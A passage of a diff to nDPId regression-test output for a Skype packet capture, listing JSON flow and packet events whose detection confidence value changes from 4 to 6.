+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":2,"flow_last_seen":1431969679581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969679581,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYa5BN98MwKgBIpxfw5E\/Sv9r73w\/CqASOJDLRwAAAgQFrAQCCApNoe2VPiMbhwEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":3,"flow_last_seen":1431969679581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969679581,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0cmZAAEAG5k\/AqAEiQTffDMORnF\/vfD8KP0r\/bIAQECwh8QAAAQEICj4jHAhNoe2V"} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1431969680121,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969680121,"pkt":"0NQSxnP1PBXCt3IOCABFAABLe\/oAAEARezTAqAEiwKgBAeRaADUAN2o90\/0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1431969680121,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969680121,"pkt":"0NQSxnP1PBXCt3IOCABFAABLZ0MAAEARj+vAqAEiwKgBAcDQADUANww\/OoYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":995,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1431969680467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969680467,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5uekAAEARKTXAqAEinTc4lDLdnEoAJXlNnGQC\/A+kfzeJzZXZQQBxWhYkhXip+EvBFG8rlU4="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":995,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":995,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1431969680467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969680467,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyVhkAAEAR2gHAqAEinTfrnjLdnF8AHti+nGYCSGBvJFR\/HGq\/K9Cny1\/vxLQHiA=="} 
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681060,"flow_last_seen":1431969681060,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969681060,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1431969681060,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969681060,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2fpAAEAGfq\/AqAEiQTffDMOSAbvQogCqAAAAALAC\/\/9eaAAAAgQFtAEDAwUBAQgKPiMhyQAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1431969681195,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969681195,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYa5BN98MwKgBIgG7w5Js9UEp0KIAq6ASOJBL6AAAAgQFrAQCCApNoe8nPiMhyQEDAwk="} 
@@ -583,50 +583,50 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/b9AAEAGpVbAqAEinTc4oMOTnFuhu64eAAAAALAC\/\/+OBAAAAgQFtAEDAwUBAQgKPiMjagAAAAAEAgAA"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4YcMAAEARzb3AqAEi1cezojLdnF0AJAuMnGgC2mPP3NT+NgZcfouOKEVgI\/tI0sJfUuMhDA=="} 
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1+dEAAEARBS\/AqAEib91KEDLdnGAAIfCsnGoCw1fhnSu+3d\/Tw+s36JFjatVqYPGvPQ=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyaGwAAEARx63AqAEinTfrnzLdnFUAHmVKnGwCxXHmKlMo0hJpMwmU59yIG9tJmA=="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":2,"flow_last_seen":1431969681627,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969681627,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBqdNzigwKgBIpxbw5OkoMOPobuuH6ASOJAefQAAAgQFrAQCCApNfpJAPiMjagEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":3,"flow_last_seen":1431969681627,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969681627,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0mLVAAEAGCm3AqAEinTc4oMOTnFuhu64fpKDDkIAQECx1FQAAAQEICj4jI\/xNfpJA"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1431969682488,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969682488,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4pYYAAEARPZvAqAEinTc4kjLdgQkAJLU7nG4Cyw+0E3ewR9IGP0eBLCPkEu6cvusCSULx8g=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1431969682488,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969682488,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2L4AAEARJivAqAEib91KHDLdnE4ALJRcnHACG8tsqKlSc3O3hWaMTNmN0BY4DMi8SBQzDHozUa6r8phn"} 
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683081,"flow_last_seen":1431969683081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969683081,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1431969683081,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969683081,"pkt":"0NQSxnP1PBXCt3IOCABFAABAOCFAAEAGavXAqAEinTc4oMOVAbs\/vddwAAAAALAC\/\/9bFwAAAgQFtAEDAwUBAQgKPiMpogAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":2,"flow_last_seen":1431969683227,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969683227,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBqdNzigwKgBIgG7w5UO87UwP73XcaASOJCODAAAAgQFrAQCCApNfpPQPiMpogEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1043,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":3,"flow_last_seen":1431969683227,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969683227,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+rpAAEAGqGfAqAEinTc4oMOVAbs\/vddxDvO1MYAQECzkpQAAAQEICj4jKjNNfpPQ"} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1431969683445,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969683445,"pkt":"0NQSxnP1PBXCt3IOCABFAABLY\/4AAEARkzDAqAEiwKgBAdRHADUAN3UY\/nwBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAABAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 